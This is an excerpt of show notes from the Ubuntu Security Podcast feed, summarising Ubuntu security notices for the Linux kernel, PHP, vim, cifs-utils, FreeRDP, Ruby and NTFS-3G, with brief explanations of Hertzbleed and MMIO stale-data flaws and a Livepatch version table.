<h3 id="usn-5478-1-util-linux-vulnerability-05-28">[<a href="https://ubuntu.com/security/notices/USN-5478-1">USN-5478-1</a>] util-linux vulnerability [05:28]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-5011">CVE-2016-5011</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Memory leak in libblkid when parsing crafted MSDOS partition table</li>
</ul>
<h3 id="usn-5479-1-php-vulnerabilities-05-40">[<a href="https://ubuntu.com/security/notices/USN-5479-1">USN-5479-1</a>] PHP vulnerabilities [05:40]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31626">CVE-2022-31626</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31625">CVE-2022-31625</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>both issues in handling of crafted inputs into database drivers - 1 for
postgres and 1 for mysql
<ul>
<li>uninitialised var in pg driver -&gt; UAF in certain error scenario -&gt; RCE</li>
<li>buffer overflow in password handler for mysqlnd (native driver) - rogue
MySQL server could trigger this to get RCE</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="news-on-latest-intel-security-issues-06-33">News on latest Intel security issues [06:33]</h3>
<ul>
<li>Hertzbleed &amp; MMIO stale data both disclosed this week</li>
<li>Hertzbleed - interesting new crypto side-channel attack demonstrated
against SIKE (Supersingular Isogeny Key Encapsulation - post-quantum key
encapsulation mechanism)
<ul>
<li>Turns a frequency side-channel into a timing side-channel such that
code which was previously assumed to be constant time can still leak
information about the key, allowing it to be recovered by mounting a
chosen cipher-text attack from a client, observing the timing response
of the server and then inferring the secret key as a result</li>
<li>Acknowledged by both Intel and AMD but likely all modern processors
which employ dynamic voltage and frequency scaling are affected</li>
<li>Intel have released guidance for how to harden crypto implementations
against this attack</li>
<li>No changes/fixes for this in kernel/microcode/toolchain etc - instead
will be up to individual libraries to assess if they may be affected
and then refactor accordindly</li>
</ul>
</li>
<li>MMIO stale-data
<ul>
<li>Vulns in memory mapped I/O - generally only applicable to
virtualisation when untrusted guest have access to MMIO
<ul>
<li>not transient execution attacks themselves <strong>but</strong> since these vulns
allow stale data to persist, can then be inferred by a TEA (think
Spectre etc)</li>
</ul>
</li>
<li>consists of a series of different issues for various microarchitectural
buffers / registers where stale data is left after being copied /
moved - then can be sampled via a TEA to infer the value</li>
<li>different processor models have different microarchitectural buffers so
some may or may not be affected</li>
<li>3 separate vulns (CVEs) identified based on the microarchitectural
buffer affected and the technique used to read from it</li>
<li>Fixes required in both kernel and intel-microcode packages
<ul>
<li>Kernels will have already been released by the time you hear this</li>
<li>Microcode is currently being released via the -updates pocket of the
archive - will then publish to -security once fully phased to all
users
<ul>
<li>Likely early on Monday next week</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>More details in next week&rsquo;s episode</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E164.mp3" length="8622745" type="audio/mpeg" /><itunes:duration>710</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 163
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-163/</link>
          <pubDate>Fri, 10 Jun 2022 15:40:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>f57e6634c8d46754d0b82ac6a7aa5e42f25f2a416fb7a2bd9a0cefe44d971d7d22620f859f114e78f8a4149a787e7077d3e87f881895ec66144d3d5ce098dd30</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 163</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we dig into some of the details of another recent Linux malware
  sample called Symbiote, plus we cover security updates for the Linux
  kernel, vim, FreeRDP, NTFS-3G and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we dig into some of the details of another recent Linux malware
  sample called Symbiote, plus we cover security updates for the Linux
  kernel, vim, FreeRDP, NTFS-3G and more.
  </itunes:summary>
        <description>  This week we dig into some of the details of another recent Linux malware
  sample called Symbiote, plus we cover security updates for the Linux
  kernel, vim, FreeRDP, NTFS-3G and more.
  </description>
        <googleplay:description>  This week we dig into some of the details of another recent Linux malware
  sample called Symbiote, plus we cover security updates for the Linux
  kernel, vim, FreeRDP, NTFS-3G and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we dig into some of the details of another recent Linux malware
sample called Symbiote, plus we cover security updates for the Linux
kernel, vim, FreeRDP, NTFS-3G and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>82 unique CVEs addressed</p>
<h3 id="usn-5456-1-imagemagick-vulnerability-00-36">[<a href="https://ubuntu.com/security/notices/USN-5456-1">USN-5456-1</a>] ImageMagick vulnerability [00:36]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28463">CVE-2022-28463</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap UAF found by oss-fuzz</li>
</ul>
<h3 id="lsn-0086-1-linux-kernel-vulnerability-00-51">[<a href="https://ubuntu.com/security/notices/LSN-0086-1">LSN-0086-1</a>] Linux kernel vulnerability [00:51]</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-30594">CVE-2022-30594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29581">CVE-2022-29581</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21499">CVE-2022-21499</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1116">CVE-2022-1116</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1055">CVE-2022-1055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0492">CVE-2022-0492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39713">CVE-2021-39713</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various recent local privesc vulns:
<ul>
<li>cgroups v1 <code>release_agent</code></li>
<li>UAF in network scheduling subsystem</li>
<li>UAF in network traffic control subsystem</li>
<li>integer overflow in <code>io_uring</code></li>
<li>seccomp restrictions bypass</li>
<li>UAF in network queuing and scheduling subsystem</li>
</ul>
</li>
<li>Secure boot bypass through <code>kgdb</code></li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>canonical-livepatch status
</span></span></code></pre></div><table>
  <thead>
      <tr>
          <th>Kernel type</th>
          <th>22.04</th>
          <th>20.04</th>
          <th>18.04</th>
          <th>16.04</th>
          <th>14.04</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>aws</td>
          <td>—</td>
          <td>86.3</td>
          <td>86.3</td>
          <td>86.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-hwe</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp</td>
          <td>86.4</td>
          <td>86.3</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>86.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>86.3</td>
      </tr>
      <tr>
          <td>generic-5.4</td>
          <td>—</td>
          <td>86.3</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke</td>
          <td>86.4</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm</td>
          <td>86.4</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>linux</td>
          <td>86.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency</td>
          <td>86.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>86.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>86.3</td>
      </tr>
      <tr>
          <td>lowlatency-5.4</td>
          <td>—</td>
          <td>86.3</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>oem</td>
          <td>—</td>
          <td>—</td>
          <td>86.3</td>
          <td>—</td>
          <td>—</td>
      </tr>
  </tbody>
</table>
<h3 id="usn-5465-1-linux-kernel-vulnerabilities-02-02">[<a href="https://ubuntu.com/security/notices/USN-5465-1">USN-5465-1</a>] Linux kernel vulnerabilities [02:02]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-30594">CVE-2022-30594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1966">CVE-2022-1966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21499">CVE-2022-21499</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>secure boot bypass via kgdb</li>
<li>UAF in netfliter -&gt; privesc</li>
<li>seccomp restrictions bypass</li>
</ul>
<h3 id="usn-5466-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5466-1">USN-5466-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28390">CVE-2022-28390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28356">CVE-2022-28356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1419">CVE-2022-1419</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1016">CVE-2022-1016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4149">CVE-2021-4149</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3772">CVE-2021-3772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1966">CVE-2022-1966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21499">CVE-2022-21499</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>secure boot bypass, netfilter UAF plus btrfs deadlock, infoleak in
netfilter + virtual graphics manager, double free in 802.2 LLC driver and
EMS CAN/USB drivers</li>
</ul>
<h3 id="usn-5467-1-linux-kernel-vulnerabilities-02-29">[<a href="https://ubuntu.com/security/notices/USN-5467-1">USN-5467-1</a>] Linux kernel vulnerabilities [02:29]</h3>
<ul>
<li>21 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28390">CVE-2022-28390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28389">CVE-2022-28389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28356">CVE-2022-28356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26966">CVE-2022-26966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24958">CVE-2022-24958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23042">CVE-2022-23042</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23041">CVE-2022-23041</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23040">CVE-2022-23040</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23039">CVE-2022-23039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23038">CVE-2022-23038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23037">CVE-2022-23037</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23036">CVE-2022-23036</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1516">CVE-2022-1516</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1353">CVE-2022-1353</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1198">CVE-2022-1198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1158">CVE-2022-1158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1011">CVE-2022-1011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4197">CVE-2021-4197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3772">CVE-2021-3772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1966">CVE-2022-1966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21499">CVE-2022-21499</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Most of the above plus privesc via mishandling of permission checks when
migrating processes across cgroups, KVM page table handling -&gt; host crash
(DoS), UAF in USB-Gadget, Microchip CAN BUS Analyzer, 6pack protocol
driver and more</li>
</ul>
<h3 id="usn-5468-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5468-1">USN-5468-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28390">CVE-2022-28390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24958">CVE-2022-24958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1972">CVE-2022-1972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1158">CVE-2022-1158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1966">CVE-2022-1966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21499">CVE-2022-21499</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Subset of the above</li>
</ul>
<h3 id="usn-5469-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5469-1">USN-5469-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>20 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28390">CVE-2022-28390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28389">CVE-2022-28389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28388">CVE-2022-28388</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28356">CVE-2022-28356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1972">CVE-2022-1972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1671">CVE-2022-1671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1651">CVE-2022-1651</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1516">CVE-2022-1516</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1353">CVE-2022-1353</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1263">CVE-2022-1263</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1205">CVE-2022-1205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1204">CVE-2022-1204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1199">CVE-2022-1199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1198">CVE-2022-1198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1195">CVE-2022-1195</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1158">CVE-2022-1158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1048">CVE-2022-1048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0168">CVE-2022-0168</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1966">CVE-2022-1966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21499">CVE-2022-21499</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>More of the same</li>
</ul>
<h3 id="usn-5470-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5470-1">USN-5470-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1972">CVE-2022-1972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1836">CVE-2022-1836</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1966">CVE-2022-1966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21499">CVE-2022-21499</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5471-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5471-1">USN-5471-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29968">CVE-2022-29968</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1972">CVE-2022-1972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1836">CVE-2022-1836</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1734">CVE-2022-1734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1205">CVE-2022-1205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1012">CVE-2022-1012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1966">CVE-2022-1966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21499">CVE-2022-21499</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5458-1-vim-vulnerabilities-03-17">[<a href="https://ubuntu.com/security/notices/USN-5458-1">USN-5458-1</a>] Vim vulnerabilities [03:17]</h3>
<ul>
<li>9 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0443">CVE-2022-0443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0408">CVE-2022-0408</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0368">CVE-2022-0368</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0361">CVE-2022-0361</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0359">CVE-2022-0359</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0351">CVE-2022-0351</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0319">CVE-2022-0319</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0213">CVE-2022-0213</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4193">CVE-2021-4193</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB reads, heap buffer overflows, stack buffer overflows, UAFs etc via
crafted input files</li>
</ul>
<h3 id="usn-5460-1-vim-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5460-1">USN-5460-1</a>] Vim vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1621">CVE-2022-1621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1620">CVE-2022-1620</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1619">CVE-2022-1619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1616">CVE-2022-1616</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0943">CVE-2022-0943</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0729">CVE-2022-0729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0714">CVE-2022-0714</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0685">CVE-2022-0685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0572">CVE-2022-0572</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0554">CVE-2022-0554</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5459-1-cifs-utils-vulnerabilities-03-49">[<a href="https://ubuntu.com/security/notices/USN-5459-1">USN-5459-1</a>] cifs-utils vulnerabilities [03:49]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29869">CVE-2022-29869</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27239">CVE-2022-27239</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20208">CVE-2021-20208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14342">CVE-2020-14342</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Tools for managing cifs mounts etc</li>
<li>Privesc via stack buffer overflow in <code>mount.cifs</code> via crafted command-line
arguments - used <code>strcpy()</code> to copy the provided IP address after first
checking length - but did comparison using <code>strnlen()</code> which returns the
max length even if the string is longer - so subsequent <code>strcpy()</code> would
then overflow</li>
<li>Possible shell command injection into <code>mount.cifs</code> when it spawns a
subshell for password input</li>
<li>Exposure of host kerberos credentials when mounting a CIFS share using
kerberos authentication within a container</li>
</ul>
<h3 id="usn-5461-1-freerdp-vulnerabilities-05-21">[<a href="https://ubuntu.com/security/notices/USN-5461-1">USN-5461-1</a>] FreeRDP vulnerabilities [05:21]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24883">CVE-2022-24883</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24882">CVE-2022-24882</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-162/">Episode 162</a> - Last week we talked about a couple different packages that
mishandled empty password to then improperly authenticate a user
<ul>
<li>Similar vuln in FreeRDP when using NTLM authentication - allows a
client to authenticate to the server with an empty NTLM password</li>
</ul>
</li>
</ul>
<h3 id="usn-5462-1-usn-5462-2-ruby-vulnerabilities-06-11">[<a href="https://ubuntu.com/security/notices/USN-5462-1">USN-5462-1</a>, <a href="https://ubuntu.com/security/notices/USN-5462-2">USN-5462-2</a>] Ruby vulnerabilities [06:11]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28739">CVE-2022-28739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28738">CVE-2022-28738</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Double free in regexp compiler when handling a crafted regex as input -
so if allow attackers to provide regex which will then get compiled could
abuse this to gain code execution as the ruby interpreter</li>
</ul>
<h3 id="usn-5463-1-ntfs-3g-vulnerabilities-06-41">[<a href="https://ubuntu.com/security/notices/USN-5463-1">USN-5463-1</a>] NTFS-3G vulnerabilities [06:41]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-30787">CVE-2022-30787</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30785">CVE-2022-30785</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30789">CVE-2022-30789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30788">CVE-2022-30788</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30786">CVE-2022-30786</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30784">CVE-2022-30784</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30783">CVE-2022-30783</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46790">CVE-2021-46790</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ntfsck code execution via crafted disk images (<a href="https://ubuntusecuritypodcast.org/episode-162/">Episode 162</a>)</li>
<li>Incorrect handling of crafted disk images during mounting etc -&gt; various
heap buffer overflows -&gt; code execution</li>
<li>Logic error exposes a user to intercept the FUSE protocol traffic between
nfts-3g and the kernel</li>
</ul>
